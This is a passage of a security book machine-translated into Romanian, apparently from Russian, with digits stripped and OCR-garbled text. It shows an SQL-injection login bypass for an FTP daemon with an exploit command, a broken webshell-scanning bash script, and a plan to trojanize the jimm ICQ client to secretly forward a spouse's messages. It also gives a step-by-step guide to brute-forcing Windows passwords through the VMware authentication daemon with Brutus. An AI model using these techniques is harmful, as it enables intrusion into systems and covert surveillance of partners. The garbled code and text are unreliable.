numele utilizatorului trebuie introdus la promptul de sistem: USERmyuser Aici myuser este numele de utilizator La următoarea solicitare de sistem, trebuie să introduceți o parolă: PASS parola Aici parola este parola utilizatorului myuser Dacă numele de utilizator și parola sunt corecte, sistemul oferă acces FTP (pentru a răsfoi directoare, descărca, încărca și șterge fișiere) Dacă specificați un simbol % în loc de nume de utilizator și adăugați o interogare SQL după aceea, puteți extrage date din tabelul utilizatorilor (utilizatori) și puteți ocoli autentificarea introducând doar numărul în loc de o parolă validă: USER D) și = union selectează uid,gid homedir,shel dintre utilizatori; PERCES: După aceea, puteți lucra în sistem în numele unui utilizator legitim Exploita-ul poate fi găsit la http://downloads securityfocus com/vuLnerabiLities/exploits/ pl Pentru a rula exploit-ul, rulați următoarea comandă în consolă: /exploit pl ftp example com - Exploatații de la distanță Aici ftp example com este adresa site-ului vulnerabil (prefixul ftp indică utilizarea protocolului FTP) Dacă exploit-ul se conectează cu succes, pe ecran va apărea un meniu de comenzi: [*] Conectat Apoi ftp example com [!] Vă rugăm să alegeți o comandă apoi să executați opțiunea ftp example com : [ ] Afișați fișierele [ ] Ștergeți fișierul [ ] Redenumiți Fișier sau Dir [ ] Creați un director [ ] Ieșire Introduceți numărul de comandă Nege => La un moment dat, exploit, lansat în octombrie sub numele: „Linux-ftpd-ssl (MKD / CWD) Remote Root Exploit”, a făcut mult zgomot Printr-o vulnerabilitate dintr-o versiune specifică a demonului ftp, acest exploit a permis unui hacker să obțină drepturi de superutilizator în Linux Există, de asemenea, cazuri destul de curioase care permit utilizarea exploit-urilor de la distanță pentru a obține drepturi de superutilizator Sun a lansat sistemul de operare OpenSolaris pe suporturi amovibile (Live CD) Dacă cineva pornește folosind acest mediu OpenSolaris și are o rețea conectată la computerul său și un server DHCP disponibil (ceea ce este foarte comun în zilele noastre), atacatorii de la distanță se pot conecta la mașină cu mufa de conectare și mufa de parolă și pot comuta cu comanda su la superutilizator cu parolă opensol ari s Acest defect a fost prezent în și Sun a promis că îl va remedia în versiunile ulterioare Pentru a contracara utilizarea exploatărilor de la distanță, mulți administratori de sistem elimină informațiile despre numele demonului și versiunea de pe bannerele serviciului de sistem sau modifică aceste informații pentru a păcăli hackerii Contracararea hackerilor Multe contramăsuri au fost descrise mai devreme în prezentarea metodelor de atac al hackerilor Alte măsuri, care nu sunt menționate în mod explicit, pot fi concepute pe baza acțiunilor hackerilor descrise aici Anti-hacking pe Web este subiectul unei cărți minunate a lui Andrew Lockhart, „Anti-Hacking on the Net Trucuri "(Editura" Peter ", ) Cartea conține exact de exemple de apărare profesională (trucuri) referitoare atât la prevenirea intruziunilor, cât și la detectarea intruziunilor Sarcinile noastre sunt mult mai modeste, așa că voi da pur și simplu textul script-ului check sh (care poate fi găsit pe Web) care verifică sistemul pentru intruziune prin site-uri web Scriptul verifică dacă există unele shell-uri web cunoscute pentru hackeri în directoarele site-ului web, cum ar fi r shell, sh, void ru și dacă în fișiere sunt apelate funcții PHP suspecte, cum ar fi shell exec, base decode și create function Scriptul scrie rezultatele verificării în fișierul /var/log/check log, iar dacă se găsește ceva suspect, trimite un e-mail administratorului site-ului Testul în acest scenariu nu este exhaustiv, pot fi adăugate mult mai multe pentru utilizare reală De exemplu, în loc de funcția shell exec folosită pentru a executa comenzi de sistem, shell-urile web de hackeri pot apela funcția eval, system sau passthru în același scop În plus, lista de webshell-uri cunoscute (cgitelnet, nfm etc ) ar trebui extinsă #!/bin/bash Dacă [ $# -lt ]; atunci echo "utilizare: $ nume fișier"; ieșire ; fi RESULT="" FILE="" pentru F In $( grep "\ php$" $ ); face FIND='echo $F | grep -c "\ php$"' Dacă [ "$FIND" == "O" ]; atunci Dacă [ "$FIȘIER" == ,,H ]; atunci FILE=$F el se FILE=$FIȘIER" "$F fi continuare & Contracararea hackerilor el se if [ "$FIȘIER" == ]; atunci FILE=$F el se FILE=$FIȘIER" "$F fi Fl=' usr/"$FIȘIER dacă [ -f "$F " ]; atunci RE='grep -c r shel "$F " ' Dacă [ "$RE" != " " ]; atunci RESULT=$REZULTAT"\nGAȚIȚI un posibil fișier de hack „$F fi RE='grep -c gzinflate "$F " if [ "$RE" != " " ]; atunci RESULT=$REZULTAT"\nGAȚIȚI un posibil fișier de hack „$F fi RE='grep -c sh "SFl" ' if [ "$RE" != " " ]; atunci RESULT=$REZULTAT"\nGĂSĂ un posibil fișier de hack "$F echo $FIND "$FIȘIER" fi RE='grep -c "VvoidVru" "ÎFl" ' if [ "$RE" != " " ]; atunci REZULTAT~$REZULTAT"\nGAȚIȚI un posibil fișier de hack „$F echo $FIND „$FIȘIER” fi RE='grep -c "shell exec" "$F " dacă [ "$RE" != " " ]; atunci RESULT=$RESULT"\nshell exec:GĂUȚI un posibil fișier de hack „$F echo $FIND „$FILE” fi RE='grep -c "base decode" "$F " ' dacă [ "$RE" != " " ]; atunci RESULT=$REZULTAT"\nbase decode:GĂSĂ un posibil fișier de hack „$F echo $FIND „$FILE” fi RE='grep -c "create function" "$F " if [ "$RE" != " " ]; atunci RESULT=$RESULT"\ncreate function:GĂUȚI un posibil fișier de hack „$F echo $FIND „$FILE” fi fi FILE="" fi Terminat; FILE="" pentru F în $( grep "\ htaccess$" $ ); do FIND='echo $F | grep -c „\ htaccess$” Contracararea hackerilor if [ "$FIND" == "O" ]; atunci if [ "$FILE" =" "" ]; atunci FILE=$F el se FILE=$FIȘIER" "$F fi el se if [ "$FIȘIER" == "" ]; atunci FILE=$F el se FILE=$FIȘIER" "$F fi # echo $FIND „$FIȘIER” F =$FIȘIER dacă [ -f "$F " ]; atunci RE"'grep -c "application/x-httpd-php" "$F " if [ "$RE" != " " ]; atunci RESULT=$REZULTAT"\nGAȚIȚI un posibil fișier de hack „$F fi fi FIŞIER""" fi Terminat; FIŞIER""" pentru F în $( grep "index\ html$\|index\ php$\|index\ htm$" $ ); do FIND='echo $F | grep -c "index\ "' if [ "$FIND" =" "O" ]; atunci if [ "$FIȘIER" == "" ]; atunci FILE=$F el se FIȘIER"$FIȘIER" "$F fi e if [ "$FIȘIER" == "" ]; atunci FILE=$F el se FIȘIER"$FIȘIER" "$F fi # echo $FIND „$FIȘIER” Fl="/usr/"$FILE dacă [ -f "$F " ]; atunci RE" 'grep -i -c "viagra" "SFl" ' dacă [ "$RE" ! „O”]; atunci REZULTAT"$REZULTAT"\nGAȚIȚI un posibil fișier de hack „$F fi fi FIŞIER""" fi Terminat; continuare Contracararea hackerilor Dacă [ "SRESULT" != "" ]; atunci echo -e 'data'SRESULT » /var/log/check log echo -e 'data'SRESULT | mal -c sysadm@mysite net -s „Alerta roșie! posibil fișier de hack pe myslte net” adm n@mys te net el se echo -e 'data'" nu găsim Intrusul " » /var/log/check log fi Sarcini reale de securitate IT În acest capitol, voi da câteva exemple din situații din viața reală Exemplele vor fi destul de simple, dar într-o anumită măsură vă permit să înțelegeți stilul de gândire atât al unui hacker, cât și al unui specialist în securitate Desigur, eu însumi, fiind un astfel de specialist, nu am comis nicio acțiune ilegală, deși uneori trebuia să mă pun mental în locul unui hacker Deci, primul exemplu Utilizarea informațiilor privilegiate pentru a sparge o parolă Un insider este o persoană care lucrează pentru o companie și are acces la informații corporative non-publice Uneori, persoanele din interior pot acționa în propriile interese egoiste sau în interesul unei companii concurente În acest caz, eu eram insider, dar, paradoxal, am acționat în interesul (!) companiei mele La mijlocul anilor , am lucrat într-o mare bancă comercială regională ca administrator șef în serviciul de securitate informatică, iar departamentului nostru de programare a fost adus un nou program pentru mașini mari (mainframe) de la Unisis Acest program (nu-mi amintesc numele, să fie Laina) a fost destinat să lucreze cu clienți - persoane fizice, a fost dezvoltat de o mică companie baltică (o vom numi condiționat ABF), care era o subsidiară a companiei Unisis La acea vreme, pentru lucrul cu persoane juridice și pentru efectuarea operațiunilor de banking en-gros pe aparatele Unisys, folosim de mult un alt program dezvoltat de filiala britanică a Unisis, dar programul Laina îl putea completa cu succes În același timp, conducerea noastră a dorit să evalueze capacitățile noului program pentru a lua o decizie în cunoștință de cauză cu privire la achiziționarea acestuia (deoarece programul era foarte scump) Reprezentanții ABF și Unimas (la acea vreme - filiala din Moscova a Unisis și, conform acordului cu banca, Unimas era angajat în activități tehnice Sarcini reale ale GG-security și asistență software) a instalat o versiune demo a acestui program în banca noastră, s-a autentificat cu parola dvs și a arătat capabilitățile sale programatorilor noștri în termen de o zi lucrătoare Apoi specialiștii vizitatori au părăsit programul Laina și au plecat la un hotel de țară Era vineri seara și personalul nostru dorea să urmărească programul mai detaliat în weekend Nu era nimeni care să ceară parola (atunci oamenii obișnuiți nu aveau încă telefoane mobile) și nu voiau să aștepte până luni În calitate de specialist Unisys mainframe, m-am oferit voluntar să ajut Prima idee a fost schimbarea programului în sine Programul a fost scris în limbajul de generație a -a LINC II Acest limbaj complicat, plus mediul de programare, plus instrumentele de bază de date sunt toate de la mijlocul anilor Programul în sine a fost creat de programatori în mediul LINC II, apoi a fost realizată așa-numita generare - crearea automată a textului în limbajul COBOL antic, iar apoi compilatorul limbajului COBOL a fost deja lansat pentru a obține programul executabil Conform codului obiect, nu toate mașinile Unisys din seria A sunt compatibile, așa că oaspeții pur și simplu au adus textele sursă pe LINC II, le-au copiat pe mașina noastră și au început generarea și compilarea ulterioară Nu am putut intra în mediul de dezvoltare LINC II propriu-zis, deoarece era nevoie de autorizație pentru a accesa codul sursă al programului Laina Dar pentru mine, ca utilizator cu drepturi de administrator de sistem, erau disponibile texte deja generate în limba COBOL A rămas de găsit și corectat locul în care s-a efectuat autorizarea utilizatorilor programului Laina: în loc de o tranziție condiționată, după o comparație cu succes a numelui de utilizator și a parolei, a fost necesară introducerea unei tranziții necondiționate Apoi, introducând absolut orice nume de utilizator și orice parolă, puteți intra cu ușurință în program Am făcut modificările necesare și am rulat programul pentru compilare Dar programul era imens și mașina era lentă, așa că compilarea ar fi trebuit să dureze câteva ore În așteptarea rezultatului, m-am hotărât să nu stau cu mâinile în brațe, ci să mă gândesc dacă este posibil să găsesc parola mai repede Mai întâi, am găsit și am căutat prin fișierul cu lista utilizatorilor programului Laina Erau doar doi utilizatori: unul cu nume baltic, autorul programului (asta a fost indicat în comentarii) și, din câte știam, fondatorul și șeful ABF, celălalt cu numele „modest” UNISYS Au existat și parole criptate Algoritmul de criptare (sau, mai probabil, hashing unidirecțional) îmi era necunoscut, iar în program, după cum am văzut, a fost apelată o bibliotecă externă pentru a calcula hash-ul parolei Nu avea nicio dorință și, cel mai important, nu avea rost să scriu propria mea parolă brute force pe baza apelării acestei biblioteci, deoarece, în general, parola brute force este o modalitate mai lentă decât „repararea” mea a programului și am decis să încerc să fac doar ghiciți parola Mulți utilizatori sunt cunoscuți că aleg o parolă care se potrivește cu numele lor de utilizator Am încercat câteva UNISYS-UNISYS, ICQ și lucrează pentru un detectiv privat dar rezultatul a fost negativ Fără ezitare, am încercat UNISYS-UNIMAS (cum se spune, spunem „Unisis”, ne referim la „Unimas”) și – o, bucuria victoriei! Am ajuns în programul Laina Imediat după aceea, am întrerupt procesul de compilare - nu există nimic care să pornească mașina în zadar, deoarece scopul a fost deja atins Desigur, fără să cunosc niște informații din interior (despre relația strânsă dintre Unisis și Unimas) și fără un anumit noroc, aș fi ajuns în programul Line câteva ore mai târziu, și poate abia sâmbătă dimineața, dacă nu a început să așteptăm rezultatele compilației seara Ce spune acest exemplu? În opinia mea, despre necesitatea de a calcula și de a folosi diferite moduri pentru a-ți atinge scopul, de a gândi mai larg și în același timp de a fi destul de persistent Și ce am decis despre programul Laina? După ce l-au testat în weekend fără priviri indiscrete, programatorii și specialiștii noștri din bănci au ajuns la concluzia că programul era încă „brut”, insuficient gândit și incomod, ca urmare, șeful departamentului IT a raportat conducerii de vârf a banca că nu era indicat să cumpere programul acum Așa că hacking-ul meu moral a ajuns să economisească o mulțime de bani băncii Cu toate acestea, este timpul să trecem la al doilea exemplu ICQ și lucrează pentru un detectiv privat Momentul acțiunii este , locul acțiunii este un anumit centru regional Se știe că soții care își suspectează soțiile (și soțiile soților) că înșală apelează din ce în ce mai mult la detectivii privați pentru ajutor Desigur, nu sunt detectiv privat, ci în trecut un specialist în securitatea informațiilor și un programator cu mare experiență În plus, am o educație juridică aproape finalizată ca a doua studii superioare Și așa, o cunoștință a uneia dintre cunoștințele mele a apelat la mine cu o întrebare specifică: este posibil să aflu cu cine și despre ce vorbește soția lui la ICQ? Dacă ICQ ar fi localizat pe un computer de acasă, ar fi posibil să introduceți acolo un keylogger obișnuit sau un troian pentru a vedea corespondența Soțul meu ar fi fost destul de inteligent pentru asta Dar principala problemă a fost că ICQ era în telefonul ei mobil și de obicei nu dădea telefonul nimănui, în special soțului ei Se mai știa că, în calitate de client ICQ, avea programul jimm instalat pe telefon, ca al meu După ce mi-am avertizat clientul despre potențiala ilegalitate a acțiunilor sale de a controla corespondența altcuiva și am refuzat politicos să-l ajut, am decis totuși să mă gândesc la posibile modalități de a rezolva această problemă din punctul de vedere al unui hacker În primul rând, programul jimm este scris în Java și este gratuit Chiar dacă dezvoltatorii au luat măsuri pentru a proteja codul sursă (au aplicat Provocări reale de securitate IT numită ofuscare), este destul de ușor să transformați un program Java înapoi în cod sursă, să îl modificați și apoi să îl reasamblați într-un fișier jar Acesta este un mare plus În al doilea rând, implicit, jimm nu salvează corespondența nici pe telefon, nici pe serverul ICQ Acesta este un minus Prima idee care mi-a venit în minte a fost să schimb codul sursă jimm pentru a salva corespondența într-un fișier Dar această idee are câteva dezavantaje semnificative: în primul rând, pentru a instala un client modificat, trebuie să obțineți acces fizic la telefonul victimei; în al doilea rând, memoria din telefon se poate epuiza; în al treilea rând, pentru a vizualiza fișierul cu corespondență, aveți nevoie de acces repetat (și posibil repetat) la telefon, ceea ce, după cum știți, este foarte dificil Fără a abandona ideea inițială, vom încerca să modificăm această idee pentru a elimina neajunsurile, dacă este posibil În primul punct, se sugerează o soluție simplă - utilizarea metodelor de inginerie socială Cunoașteți victima pe internet, intrați în încrederea ei și oferiți-vă să instalați o versiune actualizată a jimm cu noi „cipuri” – imaginare sau, mai bine, cu adevărat adăugate Puteți, cel puțin, să schimbați numărul versiunii programului afișat cu unul mai mare și, în mod optim, să schimbați puțin ceva în design Deci, credem că am ocolit restricția privind accesul fizic inițial la telefon Dar cum rămâne cu următoarele două restricții? Răspunsul este simplu: utilizați capabilitățile clientului ICQ însuși Adică nu salvați corespondența într-un fișier, ci trimiteți-o în secret la numărul ICQ preînregistrat în client Astfel, soțul va fi mereu la curent cu corespondența soției sale și nu va ocupa spațiu suplimentar în memoria telefonului ei O mică nuanță - pentru a primi mesaje lungi, este necesar ca computerul cu ICQ „ascultător” să fie pornit tot timpul, cel puțin atunci când victima este online Mesajele scurte pot fi primite și offline Poți, desigur, să devii și mai „confuz” și să trimiți mesaje prea lungi în părți Și dacă din anumite motive nu suntem mulțumiți de opțiunea de „interceptare” ICQ, putem opta pentru o opțiune mult mai dificil de implementat: trimiterea mesajelor înregistrate prin poștă la adresa ta de e-mail Aceasta este o abordare care consumă mai mult timp și, după părerea mea, mai puțin elegantă Vă sugerez să luați în considerare avantajele și dezavantajele sale pentru dvs De asemenea (paranoic, atenție!) Pentru a introduce dovezi în program, puteți încerca să activați funcția de autodistrugere la comandă de la același număr ICQ specificat (sau, alternativ, de la orice număr) Deși nu știu dacă sistemul de operare al telefonului vă va permite să ștergeți fișierul din care este lansat programul care rulează Aici trebuie să experimentezi Desigur, nu vă sfătuiesc categoric să utilizați toate aceste noțiuni în practică, deoarece acestea reprezintă o încălcare a secretului corespondenței și, de asemenea, intră sub incidența articolului din Codul penal al Federației Ruse, „Crearea, utilizarea și distribuirea programe rău intenționate pentru computere ” Deși există un mic legal Lucrează pentru un anti-hacker sau „bună ziua din Brazilia” captură - acuzarea trebuie să dovedească că telefonul mobil aparține clasei calculatoarelor Deși, de fapt, conține un computer miniatural special, cu procesor propriu, RAM și memorie permanentă, dotat cu propriul sistem de operare care vă permite să rulați programe de aplicație, formal, din punctul de vedere al limbii ruse, acesta este un telefon mobil, nu un computer! Dar totuși, din punctul de vedere nu al literei, ci al spiritului legii, această manipulare cu clientul ICQ este în mod clar un act ilegal Se spune că acolo unde sunt doi avocați, sunt cel puțin trei opinii © Dar nu ar trebui să verificați singur de partea cui va lua instanța De aceea nici nu am început să experimentez pe telefonul meu și să dau viață acestei idei Despre ce crezi că vorbește acest exemplu? Despre nevoia de a gândi creativ, dar în același timp de a nu încălca legea Acum al treilea exemplu Lucrează pentru un anti-hacker sau „bună ziua din Brazilia” Acest exemplu nu învață pe nimeni nimic în mod deosebit, este pur și simplu dat aici ca o observație personală din viața autorului, care, din propria experiență, a întâlnit activitățile hackerilor brazilieni Se pare că a fost Un administrator de sistem familiar m-a sunat și mi-a spus că a găsit ceva în munca lui care merită atenția mea, și anume, urme ale unei prezențe străine pe un server care rulează Linux Când am ajuns la locul lui de muncă, mi-a arătat un director cu mai multe fișiere suspecte pe computerul lui de lucru El a găsit aceste fișiere pe server într-un director suspect, care, la rândul său, era localizat în directorul /tmp, unde, ca de obicei, toți utilizatorii au voie să scrie, să citească și să execute Le-a copiat pe o dischetă, a curățat directorul /tmp și a transferat fișierele pe stația sa de lucru Și din moment ce Windows a fost instalat pe stația de lucru, aceste fișiere nu mai erau periculoase El a mai spus că a „omorât” un proces străin de pe server care contacta o adresă IP externă O examinare a fișierelor din directorul suspect a arătat că acestea erau scripturi și un program shell Perl backconnect Totul a fost clar cu shell: este folosit pentru a se conecta la computerul hackerului pentru a depăși firewall-ul, care de obicei filtrează doar conexiunile de intrare Acest program shell a fost pe care administratorul de sistem l-a „bătut” în primul rând Unul dintre scripturi era ocupat cu extragerea unui fișier care conținea alte scripturi Cel mai mare scenariu a fost, de fapt, un vierme de internet creat de hackeri brazilieni Nu le-a fost frică să lase în comentarii poreclele și adresa site-ului lor, la care s-a făcut backconnect-ul La începutul scenariului Sarcini reale ale GG-security a existat un mesaj către alți hackeri în portugheză, numele variabilelor din program nu erau în mare parte engleză, ci portugheză Am primit esența mesajului și alte comentarii, deoarece vorbesc niște italiană și niște spaniole, care sunt limbi înrudite cu portugheza Deci, viermele a făcut o solicitare către Google, permițându-i să găsească site-uri vulnerabile Trebuie spus că în urmă cu câțiva ani acest motor de căutare cu sistemul său avansat de interogări era un „instrument” foarte puternic în mâinile hackerilor, ceea ce a făcut mai ușor să găsești site-uri web vulnerabile folosind interogări și chiar a fost numit cel mai bun program pentru hackeri în revista Hacker Acum, administrația Google a făcut multe pentru a detecta și opri astfel de solicitări în timp util După ce a găsit următorul site vulnerabil, viermele s-a copiat în directorul /tmp al serverului care găzduiește site-ul După dezarhivare, a lansat un shell de backconnect care a „bătut” pe serverul gazdelor hackerilor, dându-le acces la computerul altcuiva Și apoi procesul de căutare a site-urilor vulnerabile s-a repetat din nou Desigur, acest mecanism a funcționat doar pe Linux și alte sisteme asemănătoare Unix, dar având în vedere că astfel de servere sunt majoritatea pe Internet, hackerii au colectat o „captură” solidă de mașini cucerite Cum a pătruns viermele în computerul companiei unde lucra prietenul meu? O mică investigație a arătat că acest server a servit atât ca gateway de internet pentru întreaga rețea locală, cât și ca server web care găzduia pagina companiei, vizibilă de pe internetul extern Acum astfel de soluții sunt nepopulare din cauza potențialei lor nesiguranțe, dar mai devreme, la mijlocul anilor , puteau fi văzute destul de des Studii ulterioare au arătat că pagina companiei în sine este simplă și nu conține vulnerabilități, dar într-unul dintre directoarele site-ului, administratorul de sistem a instalat „pentru încercare” un motor gratuit utilizat pe scară largă pentru site, unul dintre modulele căruia conținea o eroare care permitea executarea de la distanță a comenzilor pe un sistem vulnerabil Administratorul de sistem însuși ar fi putut ghici acest lucru, dar l-am ajutat puțin aflând numele și versiunea motorului web direct dintr-o solicitare a unui hacker către Google într-un script rău intenționat Examinarea jurnalelor serverului web a confirmat doar presupunerile noastre Desigur, de îndată ce circumstanțele pătrunderii hackerilor au devenit clare, motorul gratuit a fost imediat eliminat În plus, administratorul a schimbat parolele utilizatorului root și ale altor utilizatori de server, a căutat fișiere suspecte (în special fișiere cu setul de biți sui d), după care a făcut o copie de rezervă și a început să se pregătească pentru actualizarea versiunii de kernel Linux la cel mai recent x, deoarece versiunea actuală era x (nu îmi amintesc exact ultima cifră) Acest lucru s-a datorat faptului că noi, din inițiativa mea, am găsit prin Google (la cererea „linux kernel local root exploit”) un exploit deschis care funcționează perfect în această versiune a nucleului pentru obținerea de drepturi de root la nivel local, și pentru cea mai recentă versiune a nucleului unui astfel de exploit nu avea VMware Pyayer nesigur Acum aș fi bucuros să revizuiesc aceste scripturi de hacker și, poate, să le descriu mai detaliat munca, dar, din păcate, nu le-am salvat din cauza prăbușirii uneia dintre partițiile de pe hard disk în urmă cu câțiva ani Apoi am pierdut câteva informații destul de importante Din fericire, marea majoritate a programelor pe care le-am creat ca programator de-a lungul anilor au supraviețuit, deoarece erau localizate într-o altă secțiune a hard disk-ului și pe medii de arhivă Prin urmare, asigurați-vă că faceți în mod regulat copii de siguranță ale datelor dvs valoroase Când scriam aceste rânduri, mi-a venit o idee „nebună” demnă de un adevărat anti-hacker - atunci a fost posibil să modific acest vierme astfel încât să nu se răspândească, ci să trimită un avertisment administratorilor tuturor web-urilor vulnerabile servere pe care le-a descoperit că computerul lor este susceptibil de preluare de către hackeri Cu toate acestea, un administrator bun va detecta întotdeauna o intruziune la timp, un administrator foarte bun o va preveni din timp, iar un administrator prost nici măcar nu va citi mailul © În ceea ce privește comunitatea de hackeri brazilieni, atunci ei erau foarte puternici și foarte neîngrădiți, pentru că la acea vreme în Brazilia nu exista nicio pedeapsă pentru infracțiunile informatice Nu știu dacă situația s-a schimbat acum Dar, conform informațiilor de pe internet și din alte mass-media, nici acum nu există nicio pedeapsă pentru hacking în Argentina, vecină Brazilia VMware Pyayer nesigur Această poveste, spre deosebire de cele trei anterioare, este plină de terminologie tehnică, ilustrații și se propune să se repete în mod independent acțiunile anti-hackerului Adevăratul titlu al acestei povești este „Ghicirea de la distanță a parolei utilizatorilor Windows cu produse VMware instalate, în special VMware Pavier” Ar trebui citit doar de hackeri suficient de instruiți, anti-hackeri și administratori de sistem (Dacă ești începător, atunci cred că după ce ai citit capitolele anterioare, nivelul tău de pregătire este destul de suficient ) Am descoperit chiar eu această posibilitate în timp ce lucram la a doua mea carte (iunie ) Vulnerabilitatea constă în demonul de autentificare VMware, vmware-authd exe Trebuie remarcat faptul că demonul vmware-authd exe pornește atunci când Windows pornește și este întotdeauna prezent în lista de procese, indiferent dacă ați pornit VMware Pyayer în timpul acestei sesiuni Căutarea mea pentru o descriere a unei astfel de vulnerabilități pe Internet (în special, printre descrierile CVE) nu a adus un rezultat pozitiv Fie nu am căutat bine, fie au „uitat” de această vulnerabilitate, fie nu au considerat-o deloc ca atare Într-adevăr, în esență, aceasta nu este o vulnerabilitate în sensul obișnuit al termenului, ci mai degrabă doar o mică gaură de securitate, o lacună pentru hackeri Sarcini reale ale GG-security A fost cam așa: am scanat cu ptar de pe a doua mașină a rețelei mele locale de antrenament (în acel moment mașina rula Linux Wask Tgask , încărcat de pe DVD) toate porturile de pe computerul meu principal (cu Windows XP) în căutarea posibilelor vulnerabilități sau uși din spate „inamice” Și Shpar, printre altele, a indicat un număr de port deschis cu un serviciu necunoscut Nici acest număr de port nu mi-a spus nimic și am decis să mă conectez la el prin protocolul telnet: tel net Spre surprinderea mea, am văzut invitația: VMware Authenticatlon Daemon versiunea , ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC Numărul de la începutul mesajului mi-a amintit de un prompt al serverului FTP și am „testat” am introdus comanda nume de utilizator USER Aici numele de utilizator este numele unui utilizator real pe sistemul meu Windows XP de pe computerul principal După apăsarea tastei Enter, demonul de autentificare a răspuns, confirmând în continuare asemănarea cu procedura de conectare FTP: Este necesară parola pentru numele de utilizator Apoi am introdus următoarea comandă: PASS parola de utilizator real Și te-ai conectat cu succes, primind mesajul: Nume utilizator autentificat Pentru orice eventualitate, am încercat HELP, HLP și apoi câteva comenzi FTP, dar toate au fost considerate incorecte de către demon Și nu e de mirare, pentru că bannerul demonului indica că acceptă protocolul SOAP (Simple Object Access Protocol) Este un protocol bazat pe XML care definește regulile de transmitere a mesajelor prin Internet între diferite sisteme de aplicații Cu toate acestea, comanda QUIT mi-a permis să ies cu succes Concluzia a fost evidentă: folosind orice program de forță brută care acceptă forța brută a parolei FTP și vă permite să schimbați numărul de port implicit, puteți ghici de la distanță parolele pentru conturile Windows de pe computerul meu, dar în loc de numărul portului , trebuie să specificați numărul Acum să trecem la implementarea practică Dacă aveți instalat VMware Pavier, puteți introduce următoarele la promptul de comandă Windows: telnet Adică, conectați-vă, așa cum se arată în Fig , în numele oricărui utilizator Windows VMware Pavier nesigur Orez Conectați-vă pe computerul local ca utilizator invitat Acum voi arăta cum puteți ghici parolele pentru autentificarea utilizatorilor folosind programul Brutus (www hoobie net/brutus) În exemplu, am folosit contul de oaspeți încorporat, care are o parolă goală în mod implicit Acest cont a fost blocat din motive de securitate, dar l-am deblocat temporar cu o comandă de consolă utilizator net Guest /act ve:yes Cel mai bine este să vă deconectați de la Internet atunci când efectuați acest experiment și, la sfârșitul lucrării, nu uitați să blocați din nou contul de invitat introducând comanda în consolă net user Guest /activ:nu Deci, lansăm Brutus și selectăm valoarea FTP în câmpul Tip Pentru a verifica dacă secvența de conectare VMware este exact aceeași cu protocolul FTP, faceți clic pe butonul Modificare secvență și priviți această secvență pentru faza numelui de utilizator (Fig ) și pentru faza parolei (Fig ) Vedem că numerele de prompt și răspuns ale sistemului se potrivesc cu cele pe care tocmai le-am văzut când ne-am conectat prin demonul VMware Ne întoarcem la fereastra principală a lui Brutus Am selectat deja opțiunea FTP ca tip (Tip), apoi bifăm caseta de selectare Single User, în câmpul UserID introducem numele utilizatorului de care ne interesează, în acest exemplu, Guest Lăsați Modul Pass neschimbat (Lista de cuvinte), vom folosi și dicționarul care vine cu Brutus - words txt Acum schimbăm portul (Port) de la la Totul ar trebui să arate ca în fig Apoi, lansați Brutus (făcând clic pe butonul Start) Sarcini reale ale GG-security Orez Secvența pentru faza de introducere a numelui de utilizator Orez Secvența pentru faza de introducere a parolei utilizatorului Parola este selectată aproape instantaneu, cu patru încercări (Fig ) De ce numărul de încercări nu este egal cu unul, chiar dacă parola goală apare pe primul loc în fișierul words txt? Răspunsul este simplu - în mod implicit, Brutus folosește conexiuni (fluxuri) în același timp (glisorul Conexiuni), astfel încât parolele pot fi selectate într-o secvență ușor diferită de cea indicată în dicționar - totul depinde de care dintre ele streamuri sistemul piratat va răspunde mai rapid Aparent, demonul de autentificare VMware este mai rapid VMware Pyayer nesigur Orez Se pregătește să ghicească parola pentru invitat Orez Parola pentru invitat a fost găsită Provocări reale de securitate IT „răspunsuri” în cazul unei parole incorecte și cu o întârziere ceva mai mare în cazul uneia corecte, motiv pentru care avem o astfel de poză Este bine că Brutus acceptă opțiunea „Quick Kill” Faptul este că, după o încercare de conectare nereușită, comanda QUIT nu funcționează, funcționează doar dacă utilizatorul se conectează În consecință, pentru a întrerupe o astfel de conexiune, este necesară opțiunea „Quick Kill” Se pornește automat și clipește roșu de fiecare dată când este declanșat La sfârșitul lucrării, nu uitați să dezactivați din nou contul de oaspete, așa cum se arată în Fig Orez Dezactivați modul cont de invitat În mod similar, puteți încerca să ghiciți parolele pentru alte conturi de pe computer În cazul literelor rusești din nume de utilizator sau parole, după cum am aflat, acestea trebuie convertite în UTF- (este amuzant, dar însuși VMware Authentication Daemon mi-a spus asta când am încercat să introduc un nume de utilizator din litere rusești prin telnet în consola Windows) După recodificare, de exemplu, numele de utilizator „Vasya” va arăta ca „R'R ° SGSTs” Astfel de caractere nu pot fi introduse direct în programul telnet, se pare că trebuie să introduceți codurile lor, cum ar fi \x \x Dar Brutus, după cum au arătat cercetările ulterioare ale autorului, „înțelege” perfect astfel de nume de utilizator și poate ghici parolele pentru ele Unul dintre site-urile pentru transcodarea online universală a chirilicei: http:// cyr com/decode/ lang-ru Dar la conversia de la cp- la UTF- , pe acest site apar uneori „eșecuri” - conversia incorectă a unor majuscule (de exemplu, „ȘI”), același lucru se întâmplă cu conversia inversă VMware Pyayer nesigur Pericolul lacunei descoperite este că, dacă Windows blochează de obicei ghicirea parolelor după mai multe încercări nereușite, atunci VMware Authentication Daemon nu face acest lucru și vă permite să ghiciți parolele utilizatorilor de la distanță sau local pe termen nelimitat, fără întârzieri în cazul introducerii unei parole incorecte Pentru a verifica acest lucru pe sistemul nostru, este suficient să puneți parola corectă la sfârșitul fișierului words txt și va fi totuși ghicit Mesajele despre încercările de conectare nereușite sunt incluse în jurnalul de evenimente de securitate Windows - Jurnal de securitate, dacă auditarea autentificare/deconectare a utilizatorului este activată, totuși, în acest caz, jurnalul indică nu utilizatorul a cărui parolă este ghicită, ci SISTEM Și numai dacă parola utilizatorului este aleasă corect, jurnalul va afișa numele acestui utilizator în evenimentele „conectare/deconectare cu succes” Trebuie remarcat faptul că auditarea evenimentelor de securitate este dezactivată implicit în Windows XP De asemenea, puteți folosi această vulnerabilitate pentru a ghici parolele pentru conturile altor utilizatori pe computerul local (ceea ce am făcut în exemplul nostru, de fapt) Cum să te descurci cu o astfel de selecție de la distanță a parolelor? Puteți specifica în regulile firewall-ului (eu folosesc firewall-ul încorporat în KIS , dar aceasta este o chestiune de gust și obișnuință) că programului vmware-authd exe îi sunt permise conexiuni de intrare numai de la adresa locală ( ) ) Dar chiar și atunci, posibilitatea de selecție locală a parolelor altor utilizatori disponibile pe acest computer este încă păstrată De exemplu, acasă puteți încerca să ghiciți parolele rudelor (dacă vi le ascund dintr-un motiv oarecare ©) Modul Brute Force disponibil în programul Brutus este justificat doar în cazul parolelor foarte scurte, mai bune decât pur digitale (cum ar fi „ ” sau chiar „ ”) Pe computerul meu, viteza 